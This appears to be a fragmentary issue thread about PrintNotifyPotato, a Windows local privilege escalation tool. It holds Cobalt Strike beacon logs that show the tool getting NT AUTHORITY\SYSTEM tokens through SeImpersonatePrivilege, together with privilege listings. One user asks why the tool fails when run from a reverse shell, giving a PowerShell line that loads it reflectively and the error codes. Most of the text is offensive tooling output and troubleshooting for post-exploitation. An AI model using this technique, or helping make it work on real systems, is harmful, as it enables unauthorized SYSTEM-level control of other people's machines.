BeichenDream
不显示 nt authority\system
Microsoft Windows Server 2012 R2 Standard
SeIncreaseQuotaPrivilege İşlem için bellek kotaları ayarla Disabled SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Enabled SeImpersonatePrivilege Kimlik doğrulamasından sonra istemcinin özelliklerini al Enabled SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Disabled
[+] received output: [] Create PrintNotify Success! [] Create FakeIUnknown Success! [] CreatePointerMoniker Success! [] Trigger......
[+] received output: [] Got Token: 0x330 [] CurrentUser: NT AUTHORITY\SYSTEM [] DuplicateTokenEx Success! PrimaryToken: 0x860 [] process start with pid 31060
[] Tasked beacon to run .NET program: PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami" [+] host called home, sent: 128121 bytes [+] received output: [] Create PrintNotify Success! [] Create FakeIUnknown Success! [] CreatePointerMoniker Success! [] Trigger...... [] Got Token: 0x334
[+] received output: [] CurrentUser: NT AUTHORITY\SYSTEM [] DuplicateTokenEx Success! PrimaryToken: 0x852 [*] process start with pid 41840
Tasked beacon to run .NET program: PrintNotifyPotato.exe C:\Windows\System32\whoami.exe [+] host called home, sent: 128103 bytes [+] received output: [] Create PrintNotify Success! [] Create FakeIUnknown Success! [] CreatePointerMoniker Success! [] Trigger...... [] Got Token: 0x31c [] CurrentUser: NT AUTHORITY\SYSTEM [] DuplicateTokenEx Success! PrimaryToken: 0x832 [] process start with pid 46152
MSSQL server, virtualbox, windows server 2016, 2019. When running it as user in cmd - works, in reverse shell not working. Why?
Assembly loaded to powershell:
$entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')
Only on reverse tcp not working
[!] Cannot CoInitializeSecurity hr = -2147417831
[!] Cannot CreateInstance PrintNotify hr = -2147024891
